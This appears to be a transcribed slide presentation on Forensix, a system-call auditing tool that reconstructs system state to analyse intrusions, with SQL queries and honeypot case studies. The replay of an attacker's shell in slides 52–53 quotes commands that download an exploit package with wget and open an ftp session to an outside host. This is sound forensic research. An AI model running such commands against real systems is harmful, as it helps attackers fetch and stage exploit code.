intrusion analysis by reconstructing system state
DESCRIPTION
Intrusion Analysis by Reconstructing System State. Ashvin Goel University of Toronto Joint work with Kenneth Po, Kamran Farhadi Wu-chang Feng and the Forensix group at PSU. Motivation. “Nothing is certain but death, taxes, and 0wned machines” - PowerPoint PPT PresentationTRANSCRIPT
1
Intrusion Analysis by Reconstructing System State
Ashvin GoelUniversity of Toronto
Joint work withKenneth Po, Kamran Farhadi
Wu-chang Feng and theForensix group at PSU
2
Motivation“Nothing is certain but death, taxes, and 0wned machines”
Exploits in software, security policies, policy enforcement
Compromised accounts
Employees gone bad
Sometimes, you need to quickly find out exactly what happened on a system
Current forensic techniques inadequateIncomplete audit information
Reconstruction process is manual and error-prone
3
The Forensix approach
Record all system activity, automate replay
“Computer TiVo”
Enable fast and accurate forensic analysis of compromised machine
What about the costs?
Forensic investigator time is expensive
Computing and storage resources are cheap and plentiful
$40 ~ 6 month replay log (small web server)
10-20% performance degradation
Cost proposition becomes more favorable every day
4
IssuesAuditing accuracy (Races and proper event attribution)
Page cache auditing to disambiguate write() races
Permeating attribution throughout kernel
Auditing overheadElimination of full read() logging
Batching and other kernel optimizations
Webstone benchmark => ~20% degradation
Reconstruction queries for intrusion analysis
5
Intrusion Analysis
Helps understand cause of attackAfter intrusion detection phase
Helps minimize after-effects of intrusionsAllows accurate assessment of extent of damageRetrieval of uncorrupted dataRetrieval of attack codeReplay of system activities related to attackRestarting services as soon as possible
Helps determine attack signaturesCan improve intrusion detection process
6
Analysis Requirements
Complete - analysis of all intrusions
Predictable - analysis shouldn't disturb evidence
Flexible - comprehensive views of system state
Replay bug - reconstruct specific activities
Dependency - express relations between activities
Real-time - iterative process
Performance - low overhead
7
Complete Analysis
Capture system call activityHost intrusions must manipulate processes, filesRequires making system calls
AssumptionsKernel is not compromisedDisable writes to kernel memory
8
Forensix architecture
9
Public network
Batched Record Processing
Private network
TargetSystem
Append-Only Files
Logging Pinhole
Database Backend
Forensic Analysis
BackendStorageSystem
Operating System
Application Server
Authenticated System-CallLogging Facility
Provides complete,authenticated
service
ForensixArchitecture
• System-call data analyzed on backend system• Provides completeness and predictability
10
Flexibility?
System call data is too low levelDeals with kernel entities (FDs, PIDs)Gives state change information
Humans are interested in user-visible system stateUser-level entities (files, process names)Need system state information at a given time/interval
Reconstruction is linear, complicated and slowSystem semantics are complicated
Process identifier can have different names (e.g., execve)
File descriptor can have different names (e.g., close, dup)
Analysis tools are hard to write and slow
11
Example #1
User queryList all processes that existed in the last hour
Query over raw audit dataProcess all fork and wait audit events to determine lifetimes of each process on the systemSelect those processes that existed in the last hour
ImprovementTime-indexed process table
12
Example #2
Suspected ptrace-execve race that created a new setuid binary yesterdayUser query
Compare setuid root binaries of today to a few days agoFind files with owner=O and permission=P at time=T
13
Example #2
Query over raw audit dataFind all files owned by O at time T
For each file created (mkdir, mknod, create, symlink), find last event (chown) before T that set owner to O
Remove files that were deleted before T (rmdir, unlink)
Find all files with permission P at time TFor each file created (mkdir, mknod, create, symlink), find last event (chmod) before T that set permission to P
Remove files that were deleted before T (rmdir, unlink)
Return intersection of above two queries
ProblemAll events must be examined (only last one matters)
14
Example #3
Suspected rootkit (rkid.tar.gz) and local root exploit (xpl.tar.gz) packages installed on machine at some point in time
Unpack into directories named rkid and xpl
User queryFind the contents of directory=D at time=T
Query over raw audit dataFind each file created (mkdir, mknod, create, symlink, link), updated (rename), or removed (rmdir, unlink) from directory=D before time=T
Problem (same as Example #2, replay all events)
15
Other examples
Tracking modifications to /etc/passwdFind the path name of a file whose inode=I at time=TReturn all modifications done on inode=I
Privelege escalationsFind processes whose effective user id=E between Ts and Te
16
Reconstructing System State
17
System State Mappings
Map kernel entities to user-visible system stateTrack changes to this mapping over time
Table of “object and attribute lifetimes”
Allows analysis tools to reuse reconstructed stateMappings constructed upon audit insertion to backend databaseLifetimes stored in “interval tables”
18
Interval Tables
Mapping table Table columns System calls
inode table inode+, file_name, parent_inode+, Ts, Te
connection table inode+, connection_tuple+, Ts, Te socketcall* (accept, connect, etc.)
file_owner table inode+, owner, group, permission, Ts, Te
process table pid+, inode+, file_name, parent_inode+, Ts, Te fork*, execve*, wait*process_owner table pid+, uid, euid, gid, egid, Ts, Te fork*, execve*, wait*, setuid*
create*, mkdir, link, symlink mknod, rename, unlink, rmdir
create*, mkdir, symlink, mknod, chown*, chmod*, unlink, rmdir
19
Interval tables
Each table has ID, begin and end timeComplexity of system semantics interpreted when mappings are constructedAnalysis queries written in SQL
Without iteration or recursionEasier optimization of queries
20
Constructing Mappings
Mappings are constructed for a time intervalNeed at least two queries
New rows created with begin timeUpdate current rows with end time
Construction is idempotentAllows overlapping construction, deletion, recreation
Reconstruction must be in time order
21
Mapping Issues
Each kernel entity should be uniquePID, INODE have to be unique
PIDAdd generation number during backend processing
Generation number initialized to current time
INODEPersistent generation number available from file system
Generation number is incremented when inode is reused
22
Example #2 revisited
Find files with owner=O and permission=P at time=TSELECT f.inodeFROM file_owner fWHERE f.owner = O AND f.permission = PAND T BETWEEN (f.ts, f.te)
23
Example #3 revisited
Find the contents of directory=D at time=TSELECT i.file_nameFROM inode iWHERE i.parent_inode = DAND T BETWEEN (i.ts, i.te)
24
Analysis Tools
25
Types of Tools
File-Access TrackerShows files accessed or modified in a time interval
IO TrackerReplays IO performed by processesReconstructs contents of files and directories
Dependency TrackerDisplays dependencies between processes and files
26
File-Access Tracker
General query to display access or modification times of files
Uses two queriesCalls that use paths (rename, unlink, etc.)
Calls that use file descriptors
Shows all names of accessed or modified filesHard links, removes, renames, etc.
Filtering to limit resultsEvent type (i.e. create, open), time interval, last access, file names, file attributes, process names, process attributes
Implemented via a join of interval tables and underlying Forensix tables
27
SQL code for finding files modified via file descriptors
SELECT i.inode+, max(e.time)FROM event e, fd_mapping f, inode_mapping iWHERE e.syscall in (read*, write*, fchown, fchmod, truncate*) AND f.pid+ = e.pid+ AND f.fd = e.fd AND f.i_id = i.id AND e.time BETWEEN f.begintime AND f.endtime AND e.time BETWEEN starttime AND finishtimeGROUP BY i.inode+;
28
IO Tracker
Process IO trackerList all I/O of a processUseful for recreating shell session (w/ descendants)Use process interval table to get PID+ given a nameUse inode interval table to get inode of terminal
File IO trackerList all I/O for a fileUseful for reconstructing access to and modification of filesUse inode interval table to get inode of file
29
Process IO Tracker
Find descendants of PIDto track user sessions
INSERT INTO tmp_event (id, time)SELECT e.id, e.timeFROM event e, fd_mapping f, tmp_pid p, inode_mapping iWHERE e.syscall in (write*) AND f.pid+ = e.pid+ AND f.pid+ = p.pid+ AND f.fd = e.fd AND f.i_id = i.id AND e.time BETWEEN f.begintime AND f.endtime AND i.path = path; (e.g., /dev/pts0)
SELECT dataFROM io, tmp_event eWHERE io.parent = e.idORDER BY e.time;
30
File IO Tracker
File trackerSimilar to process IO tracker, but with inode instead of PIDObtains inode at recreation timeRecreates opens, writes, seeks and truncatesDoes not currently track memory-mapped writes
31
Directory Tracker
List paths in inode interval table with prefix that matches directory
See example #3
32
Dependency Tracker
Used to determine contamination of system by malicious activity
Process to process dependenciesFork or execve
File to process dependenciesProcess reads from file
Process to File dependenciesProcess writes to file
File to file dependencies (bidirectional)Two file names refer to same file (link, chroot)
33
Backward and Forward Tracking
Need one or more detection pointsBackward tracking
Shows sequence of states that lead to a detection point
Forward trackingShows sequence of states affected by a detection point
Needs filters for additional pruning
34
Evaluation
35
Setup
Honeypot systemRedhat 7.1 (seawolf) distributionVulnerabilities
Httpd with SSLWu-ftpdSendmailPtrace
2600+ AMD Athlon frontendIntel Pentium 2.4 GHz backend, 512 MB, 120 GB
36
FTP intrusion #1:Files Modified Daily
05/17/04 05/18/04 05/19/04 05/20/04 05/21/04 05/22/04 05/23/040%
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
/usr/spool/sbin/root/incoming/home/ftp/etc/dev/bin/var/tmp
37
Analysis of FTP Intrusion #1/bin 1 /bin/netstat 05-17 15:54:17
/etc 28 /etc/passwd 05-17 15:52:04
/etc/group 05-17 15:51:29
...
/ftp 1773
/home 6
/incoming 3
/root 1 /root/.bash_history05-17 16:43:25
/sbin 1 /sbin/ifconfig 05-17 15:54:18
/spool 5
/tmp 328
/var 29
/usr 3 /usr/bin/killall 05-17 15:54:22
/usr/bin/chfn 05-17 16:04:14
/usr/bin/chsh 05-17 16:06:04
Files modified by root, grouped by directory
38
FTP intrusion #2
39
Analysis of FTP intrusion #2/bin 74 /bin/kill 05-12 17:11:58
/bin/ps 05-12 17:11:46
/dev 3
/etc 84 /etc/passwd 05-12 17:11:20
/home 11
/lib 588
/root 3 /root/.bash_history05-12 18:40:32
/sbin 175 /sbin/ldconfig 05-12 17:12:09
/tmp 26
/var 452
/usr 26 /usr/bin/killall 05-12 17:11:46
Files modified by root, grouped by directory
40
FTP intrusion #2 analysis
Query Time TakenList all modified files and directories 11 sDependency graph generation 22 sFinding interactive shells < 1 s
Finding UID of shell process < 1 s
Replaying attacker's shell 1 s
Recreation of the removed attack files 3 s
1 s
Finding the listening port set by the attack code 1 s
Finding execves issued by the children of the compromised in.ftpd process
41
Overhead (Busiest Day)
Number of events 15.6 millionTotal file size 1.7 GBSize of database w/o interval tables 2.2 GB
Size of interval tables 64 MB
Database loading time 37.8 minInterval table generation time 26.4 min
42
Performance Under Heavy Load
Storage needs under heavy load8-10 GB per day
Mapping tables can be purged and recreated
Experiment Linux ForensixKernel build time (seconds) 193.8 195.0(0.6%)Webstone throughput (Mbs) 258.3 239.2 (92.6%)
43
Related WorkSystem call monitoring
USTAT: uses state transitions to detect intrusions
Tripwire, Coroner's Toolkit, Sleuth KitDetects file modifications
Recovers deleted files from unallocated disk blocks
SebekCaptures write calls to replay attacker's keystrokes
ReVirt, BacktrackerLIDS
Secure front-end operation
Elephant file systemProvides file system snapshots
44
Conclusions
Empower the user when system is compromisedProvide a complete picture of the extent of damageRetrieve uncorrupted dataProvide hints to harden systemImplement tools to allow analysis of large dataCreate mappings
Between kernel entities and user-visible state
Simplifies toolsAllows intrusion analysis in near real-time
45
Current status
Project page
http://syn.cs.pdx.edu/projects/4N6
Source code availability
http://forensix.sourceforge.net
Sample queries
Replay Shell (demo), Process Tree, Privilege Escalation
46
Future Work
Reduce mapping timeReduce/filter the amount of data collectedApply tools for intrusion detection
47
Future work
Incorporating functionality from other forensic tools
Full audit trail allows Forensix to superset other tools
Selective undo
“Back to the Future”
Automate system restoration
48
Example of Mapping Construction
/* Create new row. Fill begin time */INSERT IGNORE INTO inode_mapping (inode+, path, type, begintime)SELECT p.inode+, p.dst_path, p.type, e.timeFROM event e, path pWHERE e.id = p.parent AND e.syscall IN (mknod, mkdir, link, rename, symlink) AND e.returncode >= 0 AND e.time BETWEEN mapping_starttime AND mapping_finishtime;
/* Update end time */UPDATE inode_mapping i, event e, path pSET i.endtime = e.timeWHERE e.id = p.parent AND e.syscall IN (unlink, rename, rmdir) AND i.inode+ = p.inode+ AND i.path = p.src_path AND i.endtime IS NULL AND e.returncode >= 0 AND e.time BETWEEN mapping_starttime AND mapping_finishtime;
49
Issues With Constructing Mappings
Exit and close can be implicitE.g., process killed by signal
Examine status of parent's wait system call
Allows building queries based on signal information
State of currently running processes not knownOpen file descriptors
Files currently on system
Vfork seen after process starts executingInode number obtained before or after system call
Race condition
Remotely mounted filesInode numbers are not unique
50
httpd
/bin/sh
/bin/bash
/bin/bash
/usr/bin/wget
/bin/bash
/usr/bin/wget
/bin/bash
/usr/bin/ftp
XXX.XXX.XXX.XXX
Backward Trackingthe SSL Intrusion
51
Forward Trackingthe SSL Intrusion
sshd
sshd
sshd/bin/bash
/bin/sh/bin/bash/bin/bash /bin/bash /bin/bash/bin/bash
/usr/X11R6/bin/xauth/usr/bin/man
/usr/bin/man
/bin/sh
/bin/sh
/bin/sh
/bin/gzip
/var/cache/man/cat1/chfn.1.gz
sshd
sshd
/bin/bash
/usr/bin/scp
/usr/bin/make
/usr/bin/make
/usr/bin/cc
/usr/bin/cc
/usr/bin/cc/usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0
/tmp/ccQJlNCh.i
/usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1
/tmp/cc3OSWoi.s
/bin/vi
/javabot/.awu3.c.swp
/bin/vi
/javabot/.awu3.c.swp /javabot/awu3.c
/usr/bin/make
/usr/bin/make
/usr/bin/cc
/usr/bin/cc /usr/bin/cc
/usr/bin/cc
/usr/bin/cc
/usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0
/tmp/ccsxaQP2.i
/usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1
/tmp/ccAttbB1.s
/usr/bin/as
/tmp/ccxfpTiv.o
/usr/lib/gcc-lib/i386-redhat-linux/2.96/collect2
/usr/lib/gcc-lib/i386-redhat-linux/2.96/collect2
/usr/bin/ld
/javabot/awu3
/tmp/ssh-XXyOBEne/cookies-n
/javabot/awu3.c
XXX.XXX.XXX.XXX
LoginEditing source file
Man page - chfn
Compilingsecond attack
52
connected using addr 0xbffff7dc - overflow?bash-2.04$ cd /var/tmpbash-2.04$ wget http://pub.inter.net/xpl.tgz--12:32:42-- http://pub.inter.net/xpl.tgz => `xpl.tgz'Connecting to pub.inter.net:80...public.inter.net: Host not found.bash-2.04$ ftp -v XXX.XXX.XXX.XXX
Analysis of SSL Intrusion
53
connected using addr 0xbffff7dc - overflow?bash-2.04$ cd /var/tmpbash-2.04$ wget http://pub.inter.net/xpl.tgz--12:32:42-- http://pub.inter.net/xpl.tgz => `xpl.tgz'Connecting to pub.inter.net:80...public.inter.net: Host not found.bash-2.04$ ftp -v XXX.XXX.XXX.XXX
IO Tracking the SSL Intrusion
54
Ftpd Attack Analysis
Query Time TakenList all the files or directories modified by euid = 0 44 sRecreation of / ftp/ incoming/ lrk5.src.tar.gz 2 sRecreation of /etc/passwd file < 1 s
Recreation of all filenames in /home/ javabot directory < 1 s
Recreation of /home/ javabot/ .bash_history file < 1 s
Dependency generation, one hour 22 s
Pruning of dependencies, one hour 4 s
Filtering of dependencies, one hour 1 s
55
SSL Attack Analysis
Query Time TakenQuery for bash processes in pid_mapping table < 1 sRun IO tracker for 8 bash processes ~= 1-15 sFind files modified by user apache 7 sRecreate modified apache log files 8 sDependency generation, 30 min 51 sPruning of dependencies, 30 min 3 sFiltering of dependencies, 30 min 1 sDependency generation, 1 day 202 sPruning of dependencies, 1 day 14 sFiltering of dependencies, 1 day 2 s
56
Bug Fixes
Direct delivery from kernel to backendTricky implementation1-2 copies
Removing forensix module works nowRace between processes using the module and module being removed
Removed auto increment in event tableComma fixes for loadingVfork fix